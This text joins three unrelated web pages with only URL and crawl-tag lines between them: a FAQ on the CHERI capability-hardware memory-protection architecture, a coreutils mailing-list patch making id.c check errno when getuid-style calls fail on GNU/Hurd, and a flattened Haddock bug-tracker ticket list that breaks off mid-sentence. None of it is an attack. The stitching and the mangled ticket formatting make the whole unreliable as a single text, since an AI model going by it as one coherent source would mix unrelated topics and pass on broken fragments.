CHERI CHERI frequently asked questions (FAQ) Here are answers to some of the common questions we've received (or in some cases, anticipate) about CHERI. See the BERI FAQ for questions about the BERI platform. CHERI: Capability Hardware Enhanced RISC Instructions - What is CHERI? CHERI refers to Capability Enhanced RISC Instructions, an Instruction-Set Architecture (ISA) extension that implements a hybrid capability-system model providing fine-grained memory protection and scalable software compartmentalisation. Memory capabilities describe bounded regions of virtual-address space, which may be sealed and combined with protection-domain crossing to implement software compartmentalisation. CHERI is targeted by the compiler and used to represent programming-language level protection properties, in contrast to conventional memory management units (MMUs) that are used to construct page-based virtual memory by operating systems. In CHERI, the capability coprocessor and MMU live side by side, hence being a hybrid model, providing strong protection guarantees while allowing significant compatibility with current software at both binary and source-code levels -- a technique inspired by our earlier work on Capsicum, a hybrid capability-system model for UNIX. CHERI also refers to our prototype implementation of the ISA, embodied in a capability coprocessor in the BERI implementation. We have released the BERI source code, along with adaptations of the FreeBSD operating system and LLVM compiler suite supporting CHERI. Please see our hardware downloads and software downloads pages for more information. Development of BERI and CHERI was supported by grants from DARPA and Google. - What is a hybrid capability system? Capabilities are unforgeable tokens of authority that may be passed from subject to subject (delegated) granting rights to objects; typically, capabilites incorporate both a reference to an object and a mask of permissions reflecting possible operations or methods on the object. Conventional capability systems constrain executing code such that executing code can access only objects as permitted via capabilities; this limitation might be enforced by constraints imposed by an ISA, operating-system API, programming language, network protocol, or even by static or dynamic limits imposed on a program using code analysis or transformation. Microkernels (such as seL4) often implement capability systems as their fundamental security model as the model provides a strong mechanism on which many different policies can be implemented. A hybrid capability system is one in which more conventional systems designs (such as a UNIX kernel or RISC processor) are adapted to support a capability model such that some, but not all, code is limited by capability-system constraints, and a set of pragmatic tradeoffs are adopted to allow conventional system objects to be exposed via more capability-esque models. For example, Capsicum composes a capability-system model with the UNIX API, treating file descriptors as capabilities, and allowing selected processes to be marked as losing access to global system namespaces, in effect, imposing a capability system. Hybrid capability systems offer improved adoptability by allowing components of existing applications to be selectively migrated to a least-privilege programming model, although at the cost of reduced robustness and security as compared to a pure capability system and application suite written entirely with those goals in mind. - What is the difference between BERI and CHERI? BERI is the Bluespec Extensible RISC Implementation, a hardware description of a 64-bit pipelined RISC processor, as well as debugging tools and C-language simulated buses and devices. CHERI is a set of ISA and implementation extensions providing fine-grained memory protection and support for scalable software compartmentalisation developed as part of the CTSRD Project joint between SRI International and the Universit of Cambridge Computer Laboratory. The BERI implementation includes optionally compiled support for CHERI, enabled via the CP2 flag at compile-time. CHERI occupies the coprocessor-2 instruction encoding space, and must be explicitly enabled. You may find Capability Hardware Enhanced RISC Instructions: CHERI Instruction-set architecture (UCAM-TR-850) and our ISCA 2014 paper The CHERI capability model: Revisiting RISC in an age of risk useful reading if this is of interest to you. - Why 32 capability registers? As our starting point was the 64-bit MIPS ISA, we made a number of design choices to maximise congruence in the CHERI ISA, including selecting 32 capability registers to correspond to the 32 general-purpose registers in the MIPS ISA. This is an arbitrary choice, and one we may revisit due to its size: we believe that a 16-entry capability register file would be entirely adequate. We could also imagine splitting a 16-entry file into two parts, one intended for userspace, and the other for privileged use, to reduce system-call overhead. - Could you do it with fewer than 256 bits? 256 bits arises out of the desire to support three full 64-bit values (base, length, and type/cursor). A number of proposals have been made for how pointers can be compressed when used in fat-pointer contexts, such as the Low-Fat Pointer scheme proposed by Kwon, et al., which could help reduce this size. In our 2014 ISCA paper, we performed simulations that demonstrated that capability size does play a signficant role in performance, and believe that there are plausible 128-bit layouts that retain most of the functionality we desire using a somewhat reduced available address space combined with modest compression schemes. However, based on our goals to support many current software designs via source-level compatibility, we believe that it is important to retain byte-level granularity and so would avoid trying to reduce bit footprint by, for example, reducing this to 32-bit or 64-bit granularity. This is particularly important to handle packet and string parsing. - Why tagged memory? Many memory-based attacks on contemporary hardware-software designs rely on corrupting pointers or lengths. Tags provide strong pointer-integrity guarantees that are difficult to implement efficiently without hardware support. Tags add one bit of memory for every 256 bits of data, leading to negligible memory overhead; they are maintained with cache lines and so obey normal cache-coherency rules. In CHERI, we partition physical memory, setting aside a portion to hold tags, rather than requiring a change in DIMM interface. Currently, that partition is hard-coded, but it would ideally be managed by the firmware or software supervisor. - How specific is CHERI to the MIPS ISA? In short, not very: we used the 64-bit MIPS ISA as a starting point as we required large address spaces and access to a conventional software stack, but CHERI is at heart a RISC rather than MIPS-ISA approach. CHERI is "localised" to MIPS in the sense that it occupies a MIPS-ISA coprocessor encoding, and we adopt a number of design conventions congruent to the MIPS ISA to ease compiler support, but it is easy to imagine applying these ideas to other 64-bit RISC ISAs such as ARMv8 and RISC-V. The current CHERI ISA, as well as information on our design choices and potential applicability to other RISC ISAs, is described in our Capability Hardware Enhanced RISC Instructions: CHERI Instruction-Set Architecture technical report. - How does CHERI compare with other memory-protection schemes? Our 2014 ISCA paper includes a detailed comparison of the protection semantics and performance of CHERI as compared to other schemes, including software bounds checking, Intel MPX, HardBound, Mondriaan, and M-Machine. Each selects a different point in a larger tradeoff space. Key design choices that have motivated CHERI include a focus on providing strong protection for C-language pointers, hybridization with MMU-based virtualization, avoidance of hardware lookup tables and associative structures in the microarchitecture, and strong support for existing software stacks.
http://www.cl.cam.ac.uk/research/security/ctsrd/cheri/cheri-faq.html
CC-MAIN-2016-40
en
refinedweb
Paul Eggert wrote: > On 11/15/11 05:07, Ludovic Courtès wrote: > >> On GNU/Hurd, no error would ever be raised (since uid_t is unsigned), > > Ouch. Thanks, now I understand Roland's suggestion. > How about this patch instead? > > id: handle (uid_t) -1 more portably > * src/id.c (GETID_MAY_FAIL): Remove. > (main): Check for nonzero errno, rather than having a compile-time > GETID_MAY_FAIL guess. Suggested by Roland McGrath in > <>. > Also, the old code was incorrect if uid_t was narrower than int. > (print_full_info): Remove unnecessary cast to -1. > diff --git a/src/id.c b/src/id.c > index 047e40b..9fa93f8 100644 > --- a/src/id.c > +++ b/src/id.c > @@ -38,13 +38,6 @@ > proper_name ("Arnold Robbins"), \ > proper_name ("David MacKenzie") > > -/* Whether the functions getuid, geteuid, getgid and getegid may fail. */ > -#ifdef __GNU__ > -# define GETID_MAY_FAIL 1 > -#else > -# define GETID_MAY_FAIL 0 > -#endif > - > /* If nonzero, output only the SELinux context. -Z */ > static int just_context = 0; > > @@ -208,22 +201,32 @@ main (int argc, char **argv) > } > else > { > + /* POSIX says getuid etc. cannot fail, but they can fail under > + GNU/Hurd and a few other systems. Test for failure by > + checking errno. */ > + uid_t NO_UID = -1; > + gid_t NO_GID = -1; > + > + errno = 0; > euid = geteuid (); > - if (GETID_MAY_FAIL && euid == -1 && !use_real > + if (euid == NO_UID && errno && !use_real I like that. Thanks!
http://lists.gnu.org/archive/html/bug-coreutils/2011-11/msg00137.html
CC-MAIN-2016-40
en
refinedweb
On Tue, 25 Nov 2008, Eric W. Biederman wrote:> Steven Rostedt <[email protected]> writes:> > > On Tue, 25 Nov 2008, Dave Hansen wrote:> >> > > >> >> >> > need to care about this. This file may actually be modified in the future > >> > by users, so this may become an issue.> >> > >> This really has very little to do with root vs non-root users. In fact,> >> we're working towards having cases where we have many "root" users, even> >> those inside namespaces. It is also quite possible for a normal root> >> user to fork into a new pid namespace. In that case, root simply won't> >> be able to use this feature because something like:> >> > >> echo $$ /debugfs/tracing/set_ftrace_pid> >> > >> just won't work. Let's look at a bit of the code.> >> > >> +static void ftrace_pid_func(unsigned long ip, unsigned long parent_ip)> >> +{> >> + if (current->pid != ftrace_pid_trace)> >> + return;> >> +> >> + ftrace_pid_function(ip, parent_ip);> >> +}> >> > >> One thing this doesn't deal with is pid wraparound. Does that matter?> >> > Should not. This is just a way to trace a particular process. Currently > > it traces all processes. If we wrap, then we trace the process with the > > new pid. This should not be an issue.> > So. Using raw pid numbers in the kernel is bad form. The internal> representation should be struct pid pointers as much as we can make> them.> > I would 100% prefer it if ftrace_pid_func was written in terms of struct> pid. That does guarantee you don't have pid wrap around issues.> It almost makes it clear > > +static void ftrace_pid_func(unsigned long ip, unsigned long parent_ip)> +{> + if (task_pid(current) == ftrace_pid_trace)> + return;> +> + ftrace_pid_function(ip, parent_ip);> +}> > We don't need locks to access the pid of current.That version does not bother me. I'm not worried about locks as much asI am about recursion. If that "task_pid()" ever became a function that istraced by mcount, then it will end up in a recursive loop, and will crash the system.> > > >> If you want to fix this a bit, instead of saving off the pid_t in> >> ftrace_pid_trace, you should save a 'struct pid'. You can get the> >> 'struct pid' for a particular task by doing a find_get_pid(pid_t). You> >> can then compare that pid_t to current by doing a> >> pid_task(struct_pid_that_i_saved, PIDTYPE_PID). That will also protect> >> against pid wraparound.> >> > >> The find_get_pid() is handy because it will do the pid_t lookup in the> >> context of the current task's pid namespace, which is what you want, I> >> think.> >> > Nope, we can not call that in this context. ftrace_pid_func is called > > directly from mcount, without any protection.> > Of course you can't. But at the same time find_get_pid() is always> supposed to be called on the user space pid ingress path.> > > struct pid *find_get_pid(pid_t nr)> > {> > struct pid *pid;> >> > rcu_read_lock();> > pid = get_pid(find_vpid(nr));> > rcu_read_unlock();> >> > return pid;> > }> > EXPORT_SYMBOL_GPL(find_get_pid);> >> > This means find_get_pid will call mcount which will call ftrace_pid_func, > > and back again. This can also happen with rcu_read_{un}lock() and > > get_pid() and find_vpid().> >> > We can not do anything special here.> > I don't see the whole path. But here is the deal.> 1) Using struct pid and the proper find_get_pid() means that a user with> the proper capabilities/permissions who happens to be running in a pid> namespace can call this and it will just work.> > 2) The current best practices in the current are to:> - call find_get_pid() when you capture a user space pid.> - call put_pid() when you are done with it.> > Perhaps that is just:> put_pid(ftrace_pid_trace);> ftrace_pid_trace = find_get_pid(user_provided_pid_value);This may be fine.> > 3) If you ultimately want to support the full gamut:> thread/process/process group/session. You will need> to use struct pid pointer comparisons.> > 4) When I looked at the place you were concerned about races > a) you were concerned about the wrong race.> b) I don't see a race.> c) You were filtering for the tid of a linux task not> the tgid of a process. So the code didn't seem to> be doing what you thought it was doing.> > 5) I keep thinking current->pid should be removed some day.> > So let's do this properly if we can. This is a privileged operation> so we don't need to support people without the proper capabilities> doing this. Or multiple comparisons or anything silly like that. But> doing this with struct pid comparisons seems cleaner and more maintainable. And that> really should matter.Just so you understand what I'm concerned about:$ objdump -dr kernel/pid.o[...]0000025f <find_get_pid>: 25f: 55 push %ebp 260: 89 e5 mov %esp,%ebp 262: 53 push %ebx 263: e8 fc ff ff ff call 264 <find_get_pid+0x5> 264: R_386_PC32 mcount 268: 89 c3 mov %eax,%ebx 26a: b8 01 00 00 00 mov $0x1,%eaxlooking in arch/x86/kernel/entry_32.S:ENTRY(mcount) cmpl $0, function_trace_stop jne ftrace_stub cmpl $ftrace_stub, ftrace_trace_function jnz trace[...]trace: pushl %eax pushl %ecx pushl %edx movl 0xc(%esp), %eax movl 0x4(%ebp), %edx subl $MCOUNT_INSN_SIZE, %eax call *ftrace_trace_functionlooking in kerne/trace/ftrace.c: if (ftrace_pid_trace >= 0) { set_ftrace_pid_function(func); func = ftrace_pid_func; } ftrace_trace_function = func;And we then havestatic void ftrace_pid_func(unsigned long ip, unsigned long parent_ip){ if (current->pid != ftrace_pid_trace) return; ftrace_pid_function(ip, parent_ip);}Now by having ftrace_pid_func call find_get_pid, we have the function flow of... schedule() /* any traced function */ --> mcount --> *ftrace_trace_function == ftrace_pid_func ftrace_pid_func --> find_get_pid --> mcount --> *ftrace_trace_function == ftrace_pid_func ftrace_pid_func --> find_get_pid [ ad infinitum ]The comparison must be very careful not to call anything that will also trace. I can add code to catch this recursion, but this is overhead I do not want to add. Remember, this is called on every function call.If we do the work at the time we set ftrace_pid_trace and we can do simple pointer comparisons in the ftrace_pid_func, I will be happy with that. I'm still learning about this pid namespace, so I'll probably screw it up a few more times ;-)-- Steve
http://lkml.org/lkml/2008/11/26/301
CC-MAIN-2013-48
en
refinedweb
__color__ __group__ ticket summary type owner status created _changetime _description _reporter 3 Release 224 "Link to ""Source"" is not separate by whitespace from preceding content" defect new 2012-10-21T19:47:50Z+0100 2012-10-21T21:08:22Z+0100 "This is annoying when you try to visually mark/select a word, e.g. if you try to select [ openTempFile] in Firefox (with double a click) the ""Source"" link will get selected, too." SimonHengel 3 Release 225 no documentation for re-exported renamed modules defect new Release 226 Add a mechanism to prune deprecated things defect new Release 232 Module re-exports are handled incorrectly defect new 2012-12-12T13:29:31Z+0000 2012-12-12T17:03:07Z+0000 "Contrary to its documentation, Haddock.Interface.Create.moduleExports incorrectly assumes that for a module re-export all of its symbols are re-exported. As an illustration, shows constructors of the Test data type, although it is exported as an abstract type." feuerbach 3 Release 233 "Haddock crashes ""internal error: renameType""" defect new 2013-01-01T01:03:59Z+0000 2013-01-01T01:03:59Z+0000 "When generating docs for, haddock crashes: {{{ ~/code/projects/record/src/Data> haddock Record.hs -v 3 Creating interfaces... Haddock coverage: Checking module Data.Record... Creating interface... doc comment parse failed: See 'alter' > [alt|x|] == alter (undefined :: Key x) doc comment parse failed: See 'access'. > [get|x|] == access (undefined :: Key x) Warning: Data.Record: Instances of type and data families are not yet supported. Instances of the following families will be filte red out: Wrap, ++ Warning: Couldn't find .haddock for export GHC.TypeLits.Symbol 43% ( 15 / 35) in 'Data.Record' Attaching instances... Building cross-linking environment... Renaming interfaces... haddock: internal error: renameType ~/code/projects/record/src/Data> haddock --version Haddock version 2.12.0, (c) Simon Marlow 2006 Ported to use the GHC API by David Waern 2006-2008 }}} This is installed from Arch Linux's [haskell] repository, which says the version is 2.13.1-2. cabal info haddock also says I have 2.13.1 installed. But I trust haddock --version more so that's the version I used for the ticket. :)" mikeplus64 3 Release 234 Including documentation in the export list breaks headings defect new Release 239 Named chunk before imports causes error also if it is placed before module declaration. defect new 2013-02-06T21:12:07Z+0000 2013-02-06T21:12:07Z+0000 ." Davorak 3 Release 241 Ugly definition lists defect Fūzetsu assigned Release 250 haddocs fails to parse U+00A0 (aka c2 a0 NO-BREAK SPACE) in @...@ block, but works in '>' (bird track) defect new 2013-07-20T11:39:09Z+0100 2013-07-20T20:00:11Z+0100 "Bad.hs: {{{ -- | test -- -- @ -- nbsp_c2_a0 = "" "" -- @ module Bad where }}} Good.hs: {{{ -- | test -- -- > nbsp_c2_a0 = "" "" module Good where }}} Be careful: "" "" is ont ""\x20"", but ""\xC2\xA0"" in both cases. Haddock fails to parse Bad.hs, but works on Good.hs: {{{ [sf] /tmp/y:haddock --html src/Good.hs src/Bad.hs Haddock coverage: haddock module header parse failed: Cannot parse header documentation paragraphs 0% ( 0 / 1) in 'Bad' 100% ( 1 / 1) in 'Good' }}} Found in haddock-2.13.2.1. Originally if was found in directory-layour source. Hackage parses it, but not local haddock: Thanks!" slyfox 3 Release 251 don't output warning about missing rts package every time haddock generates docs defect new Release 254 Unexported things are shown as exported defect new 2013-08-29T16:39:20Z+0100 2013-08-31T20:54:57Z+0100 ." NeilMitchell 3 Release 255 Rework the test method to prevent failing tests due to interface file version changes. defect Fūzetsu assigned Release 259 Hoogle backend drops documentation for type class fields. defect Fūzetsu new Release 263 --hoogle drops module qualifier in instances defect new Release 267 Docs on arguments parsing failures defect new 2013-10-26T12:50:24Z+0100 2013-10-26T12:50:24Z+0100 "While the following parses fine: {{{ f :: (Show a) => a -- ^ Doc on /a/. -> b -- ^ Doc on /b/. -> c -- ^ Doc on /c/. }}} All the following fail: {{{ f :: (Show a) -- | Doc on /a/. => a -- | Doc on /b/. -> b -- | Doc on /c/. -> c }}} And '''the most irritating''': {{{ f :: (Show a) => -- | Doc on /a/. a -> -- | Doc on /b/. b -> -- | Doc on /c/. c }}} Thereby haddock imposes a certain formatting style, which is not very nice and not at all of its concern." nyvo 3 Release 268 Constraints block doesn't wrap lines defect new 2013-10-26T12:54:56Z+0100 2013-10-26T12:54:56Z+0100 As a result you get a doc like in the attached file[[Image(screenshot.png)]] nyvo 3 Release 269 Unexported symbols crawl out to docs defect new 2013-11-16T00:47:28Z+0000 2013-11-16T00:47:28Z+0000 "Here is a module, in which I reexport just a single function from another module: {{{ module GraphDB ( ... module GraphDB.GenerateBoilerplate, ) where ... import GraphDB.GenerateBoilerplate (generateBoilerplate) }}} The generated doc contains all the functions from this reexported module instead. To reproduce this, just check out the referred project. My Haddock version is 2.13.2.1." nyvo 3 Release 3 feature request: record types with partially exported fields enhancement somebody new 2008-06-17T01:39:02Z+0100 2009-03-25T18:09:56Z+0000 " "" Yes, I κ. Yes, I κ. <% map toUpper ""hello, world!"" %> Yes, I κ.}}} {{{ Yes, I /κ/. Yes, I κ.}}} Therefore, my question is, why is the ampersand escaped when it is inside the emphasis block, but it is not when outside? Is this consistent? I really would like to be able to emphasize characters written as HTML codes. I guess that this is happening because inside an emphasis block no Haddock parsing is done, since I noticed that inline code blocks (@...@) do not work either, which forces me to do things like: {{{ /The command /@foo@/ does not work./ }}} Not a big issue, because at least is possible to get the correct output. However, the same cannot be said about HTML codes. Another note: I think this could imply a drastic change in the Haddock parser, but it would be great if I would not need to emphasize a text line-by-line. Let me explain myself with an example. I would like to write: {{{ -- /I divided this emphasized -- text in multiple lines -- because it was too long for -- a single line./ }}} Instead of: {{{ -- /I divided this emphasized/ -- /text in multiple lines/ -- /because it was too long for/ -- /a single line./ }}}" DanielDiaz 4 Release 261 Add type signatures to index overview enhancement new 2013-09-10T10:04:07Z+0100 2013-09-10T10:04:07Z+0100? quchen 5 Release 6 There should be a --maintainer flag enhancement new 2008-06-19T20:57:40Z+0100 2008-06-19T20:57:40Z+0100 There should be a --maintainer flag to allow Cabal to pass the maintainer from the .cabal file to the generated docs. waern 3 2.13.2 Release 89 character references are not recognized in emphasized text defect SimonHengel assigned 2009-02-12T21:00:05Z+0000 2012-10-14T20:08:57Z+0100 If I write {{{/HelloA0;world!/}}} in a doc string, I don’t get a non-breaking space between “Hello” and “world!” in the output but I get “A0;” instead. g9ks157k@… 3 2.13.2 Release 211 () is not hyperlinked anymore defect new 2012-09-21T11:34:09Z+0100 2012-10-15T13:37:18Z+0100 2.13.2 Release 221 references to identifiers are not recognized in emphasized text defect SimonHengel assigned 2012-10-14T20:11:24Z+0100 2012-10-14T20:11:33Z+0100 "Minimal example: {{{ -- | /some `foo` text/ foo :: Int foo = 23 }}}" SimonHengel 3 2.13.2 Release 222 Accept any input when parsing documentation defect new 2012-10-15T00:46:33Z+0100 2012-10-15T00:46:33Z+0100 "The parser for documentation should never fail. If something is no valid Haddock syntax, then it can still be parsed as ordinary text. E.g. the following is currently a parse error: {{{ foo bar > baz }}} But we should instead parse it as: {{{ DocParagraph (DocString ""foo bar\n> baz\n"") }}} That's the way most Markdown parsers do it." SimonHengel 3 2.13.2 Release 223 Deprecation messages for re-eported items from other packages get lost defect new 2012-10-15T09:25:35Z+0100 2012-10-15T09:25:35Z+0100 SimonHengel 3 2.13.2 Release 228 Wrong links for fully qualified identifiers that are not in scope defect new 2012-11-15T15:35:21Z+0000 2013-08-14T15:52:42Z+0100 "If we have something like {{{ 'Control.Concurrent.MVar.addMVarFinalizer' }}} Haddocks thinks it is a type and will prepend a {{t:}} to the generated link. A real world example:" SimonHengel 3 2.13.2 Release 212 Investigate unexpected change with (Monad (Either e)) task new 2012-09-21T15:09:30Z+0100 2012-12-10T13:41:42Z+0000 see: SimonHengel 3 _|_ Release 10 Parsing module without explicit module declaration fails defect SimonHengel assigned 3 _|_ Release 94 Give a useful warning message instead of a cryptic parse error when encountering unexpected Haddock comments enhancement new 2009-03-01T12:13:29Z+0000 2012-03-10T00:22:08Z+0000 "See this failure when processing XMon) }}} Since we don't support Haddock comments on individual arguments of constructors, this just fails with a parse error. Perhaps we should give a warning message instead. In general, it would be good if we give a warning message instead of a parse error whenever a Haddock comment is encountered where it is not expected. I think implementing this is hard, given the way things currently work. Haddock comments are just ordinary tokens that are fed to the parser in GHC, and we clearly don't want put them all over the grammar. If we should move to a design where Haddock comments are not in the grammar, but are collected elsewhere, implementing this ticket would be easier." waern 3 None 79 Source links don't work for things defined using Template Haskell defect new 2009-02-04T22:47:31Z+0000 2012-09-25T12:09:54Z+0100 The reason for this is that HsColour can't insert anchors for TH declarations. Perhaps TH defs could be linked by line number somehow? (This would obviously need to be coordinated with HsColour.) SamB 3 None 80 No way to express docstrings in Template Haskell defect new None 101 haddock-2.4.2 shipped with ghc-6.10.2 is extremely slow defect new 2009-04-21T12:49:02Z+0100 2012-09-25T12:09:54Z+0100 `) " maeder 3 None 138 Malformed or missing comments in files with #line directive defect new 2010-07-08T04:56:19Z+0100 2012-09-25T12:09:54Z+0100 ." jmillikin 3 None 151 long lines in the synopsis defect new 2010-09-16T09:03:20Z+0100 2012-09-25T12:09:54Z+0100 "the synopsis widget looks bad for very long lines (which is bad style anyway). e.g." bastl 3 None 157 Push/improve Haddock API and .haddock files usage defect new 2010-11-04T16:28:42Z+0000 2012-09-25T12:09:54Z+0100 "I'd expect Haddock processing to involve three stages: 1. extract information for each file/package 2. mix and match information batches for crosslinking 3. generate output for each file/package where the results of 1 should be available `.haddock` files, so that stage 2/3 tools can start from there if source isn't available, and the results of 2 should be exposed in the API, so that it can be shared between backends. Currently, backends such as `--hoogle` can't start from `.haddock` files, and stage 2 processing is duplicated in what should be stage 3-only backends. It might also be useful to think about the representation of the output of stage 2 above: currently, Haddock directly generates indices in XHtml form, even though much of the index computation should be shareable accross backends. Relatedly, the Haddock executable should be a thin wrapper over the Haddock API, if only to test that the API exposes sufficient functionality for implementing everything Haddock can do. Instead, there is an awful lot of useful code in Haddock's Main.hs, which is not available via the API. So when coding against the API, for instance, to extract information from .haddock files, one has to copy much of that code. Also, some inportant functionality isn't exported (e.g., the standard form of constructing URLs), so it has to be copied and kept in synch with the in-Haddock version of the code. Overall, it seems that exposing sufficient information in the API, and allowing `.haddock` interface files as first-class inputs, there should be less need for hardcoding external tools into Haddock (such as --hoogle, or haddock-leksah). Instead, clients should be able to code alternative backends separately, using Haddock to extract information from sources into `.haddock` files, and the API for processing those `.haddock` files. (splitting Haddock into frontend/indexer/backend would be better than similar documentation plugin functionality available, for instance, in [ Javadoc doclets], for alternate output formats.) More documentation about the role and usage of these two Haddock features (API, `.haddock` files), as well as the plans for their development would also be useful. Mailing list thread:" claus 3 None 158 Quasiquotation breaks Haddock/GHCi defect new None 164 Hyperlinked identifiers are not made for identifiers from other exported modules defect new None 166 Missing identifier in Haddock defect new 2010-12-16T21:31:17Z+0000 2012-09-25T12:09:54Z+0100 . " Lemming 3 None 168 Hoogle backend attaches [incoherent] to instance documentation defect new 2010-12-22T22:45:43Z+0000 2013-09-10T10:19:42Z+0100 "Given the input file below, when running {{{haddock --hoogle Haddock.hs}}} I get the output below. There are 3 obvious bugs, all of which I think were introduced when rewriting various bits to move to using the GHC library (there was a bug number 3, which got fixed in Haddock 2.8). I'm also tracking this bug at: {{{ {-# LANGUAGE TypeOperators, IncoherentInstances #-} module Haddock where -- | BUG 1: bug1 will not have any documentation class BUG1 a where -- | This documentation is dropped bug1 :: Integer -> a data a :**: b = Bug2 -- ^ BUG 2: The :**: is prefix without brackets -- | BUG 4: The instance below has [incoherent] on it bug4 :: (); bug4 = () instance Num () }}} {{{ -- Hoogle documentation, generated by Haddock -- See Hoogle, @package main module Haddock -- | BUG 1: bug1 will not have any documentation class BUG1 a bug1 :: BUG1 a => Integer -> a data (:**:) a b -- | BUG 2: The :**: is prefix without brackets Bug2 :: :**: a b -- | BUG 4: The instance below has [incoherent] on it bug4 :: () instance [incoherent] Num () }}}" NeilMitchell 3 None 174 Haddock should hide hidden fields of re-exported modules defect new None 187 "With TH, when doing ""cabal haddock"", GHCi ""couldn't find symbol""" defect new None 195 Duplicate documentation on records defect new 2012-03-09T21:45:48Z+0000 2012-09-25T12:09:55Z+01 }}} " DanBurton 3 None 198 haddock-2.10.0 (shipped with ghc-7.4.1) crash defect new 2012-03-28T12:44:27Z+0100 2012-09-25T12:09:55Z+0100 "{{{ haddock: internal error: utils/haddock/src/Haddock/Backends/Xhtml/Layout.hs:204:9-37: Irrefutable pattern failed for pattern Haddock.Types.Documented n mdl }}} in our large project (after deleting docs/index.html and ""make doc"") " maeder 3 None 207 haddock: internal error: spliceURL UnhelpfulSpan defect new None 208 Pattern match failure when processing code using kind variables defect new None 209 "Failure in ""renameType"" when dealing with Template Haskell and tuples" defect new None 210 """failed to parse haddock prologue from file"" error when using non-ASCII characters in .cabal synopsis" defect new 2012-08-13T18:38:58Z+0100 2012-10-14T14:57:39Z+0100 "However, haddock stops failing if an ASCII(or prepended with > or ""о"") description is supplied in cabal package.[[BR]] Minimal example is attached. haddock-2.10.0, ghc-7.4.1" exbb2 3 None 43 Comments on GADT constructors enhancement nwf assigned 2008-06-28T22:32:37Z+0100 2012-10-10T21:06:34Z+0100 "eg. this fails: data I ev w a where Returns :: a -> I ev w a Binds :: I ev w a -> (a -> I ev w b) -> I ev w b Gets :: Ord ev => Maybe ev -> Maybe ev -> I ev w ev -- ^ Accept any character between given bounds. Bound is ignored if @Nothing@. " jeanphilippe.bernardy@… 3 None 70 'Contents' improvements based on Python's docs enhancement new 2009-01-10T22:00:16Z+0000 2012-09-25T12:09:55Z+0100 "Contrasting this page: With this one: We can see a number of ways to improve the library listings for haddock contents. First, there descriptions given to the libraries, rather than just their names. Second, the libraries themselves are grouped into type groups, above and beyond the lib paths themselves. Third, when you actually drill into a page a 'breadcrumb' is placed at the top of the page for navigating back out. Example, clicking on 'array' yields a page headed with: Python v2.6.1 documentation » The Python Standard Library » Data Types » These are 3 links, each stepping back up to a different containing level." crutcher@… 3 None 83 Better parse error messages when parsing the contents of Haddock comments enhancement None new 2009-02-07T10:46:27Z+0000 2012-09-25T12:09:55Z+0100 Needs to be done in GHC. waern 3 None 97 Reusable named chunks of documentation for declarations enhancement new 2009-03-09T14:52:44Z+0000 2012-09-25T12:09:54Z+0100 "Currently there is no way of using the same piece of Haddock documentation for two different declarations, apart from copying and pasting it, which can easily lead to them falling out of sync. The current `-- $` syntax only works for documentation which is not attached to declarations. Support for this is useful in cases where you have two or more functions which essentially implement a common interface that hasn't been made into a type class. Examples are `Data.ByteString` versus `Data.ByteString.Lazy` or `Data.Map` versus `Data.IntMap`: looking at the docs of `bytestring-0.9.1.4` I see that `Data.ByteString.Lazy.intersperse` doesn't say that it's `O(n)`, but `Data.ByteString.intersperse` does—an obvious omission. There should be a mechanism for avoiding these kinds of errors, which tend to become worse over time. Extending the `-- $` syntax makes the most sense to me. It could be possible to write something like the following, taking `append` from `bytestring` as an example: {{{ module Data.ByteString (...) where ... -- | @O(n)@ $append ... }}} {{{ module Data.ByteString.Lazy (...) where ... -- | @O(n/c)@ $append ... }}} {{{ -- $append -- Append two ByteStrings. }}} One thing that isn't obvious to me: should the definitions of the chunks have to be in the same module, like now, thus essentially forcing CPP usage? Or would an import be okay? That could lead to ambiguity—should the normal Haskell disambiguation syntax (`Module.foo`) be allowed, then? That could make this ridiculously complex; CPP seems the simplest solution but it's arguably not very clean. Either way would satisfy me." Deewiant 3 None 114 Make the frames version a separate output mode enhancement new None 115 allow putting support files in a relative subdir enhancement new None 144 Allow -- ^ comment on record constructor enhancement new 2010-09-01T17:12:37Z+0100 2012-09-25T12:09:54Z+0100 None 145 Type class instances: link to source enhancement new None 154 Comments on associated types enhancement new 2010-10-03T22:16:01Z+0100 2013-09-21T04:21:20Z+0100 waern 3 None 160 LaTeX output improvements enhancement new 2010-11-19T10:38:41Z+0000 2012-09-25T12:09:55Z+0100 )" mitar 3 None 185 Allow attaching new docs to functions that are re-exported enhancement new 2011-11-05T23:24:29Z+0000 2012-09-25T12:09:55Z+0100 ." duncan 3 None 193 Links to sections enhancement new 2012-02-05T09:55:21Z+0000 2012-09-25T12:09:55Z+0100 )." SimonHengel 3 None 206 Add markup support for properties enhancement new 4 None 84 Document << picure-URL >> syntax defect Fūzetsu assigned 2009-02-07T10:59:10Z+0000 2013-09-05T03:50:33Z+0100 waern 4 None 92 Source links not aligned properly in Google Chrome defect new 2009-02-25T16:04:58Z+0000 2012-09-25T12:09:55Z+0100 waern 4 None 121 "Support export of modules using their ""as"" name" defect new 2009-11-04T06:36:31Z+0000 2012-09-25T12:09:54Z+0100 "Haskell allows you to import modules using an ""as"" name, and re-export the module using that name: module Language.Python.Common ( module Pretty ) import Language.Python.Common.Pretty as Pretty It seems that Haddock 2.4.2 has trouble with this and complains that: Warning: language-python-0.2:Language.Python.Common: Could not find documentation for exported module: Pretty Changing the export to use the full qualified name of the module fixes the problem." bjpop 4 None 149 Long instance declarations are breaking layout. defect new 2010-09-07T11:23:18Z+0100 2012-09-25T12:09:54Z+0100 rkit 4 None 165 Parse error on comment before opening brace of record defect new 2010-12-12T19:06:43Z+0000 2012-09-25T12:09:55Z+0100 "This gives ""parse error on input `{'"": {{{ data Test = Test -- | A value { a :: Int -- | Another value , b :: Int } }}} This does not: {{{ data Test = Test { -- | A value a :: Int , -- | Another value b :: Int } }}} The first should parse and give the same result as the second." Mathnerd314 4 None 171 haddock fails to parse {- # ... #-} (note the space) pragma defect Fūzetsu assigned 2011-03-15T21:02:19Z+0000 2013-09-05T02:17:22Z+0100 ." slyfox 4 None 178 Haddock 2.4.2 fails to parse TemplateHaskell modules on x86_64 due to recent binutils defect new 2011-08-17T04:29:05Z+0100 2012-09-25T12:09:54Z+0100 "I know this is a relatively old version, but it's what's packaged with GHC 6.10. I figure it's worth releasing a ...1 on Hackage, if nothing else. Ticket #5050 describes how `-fvia-C` generates invalid assembly on x86_64, which is caught and refused by recent versions of binutils. The workaround is to not use `-fvia-C`. Haddock 2.4.2 is hard-coded to use `-fvia-C` if the `TemplateHaskell` language extension is enabled. This prevents TH-enabled packages from having their documentation generated: {{{ -- th_error.hs {-# LANGUAGE TemplateHaskell #-} module Main (main) where main :: IO () main = return () }}} {{{ $ /opt/ghc-6.10.4/bin/haddock th_error.hs /tmp/ghc18204_0/ghc18204_0.s: Assembler 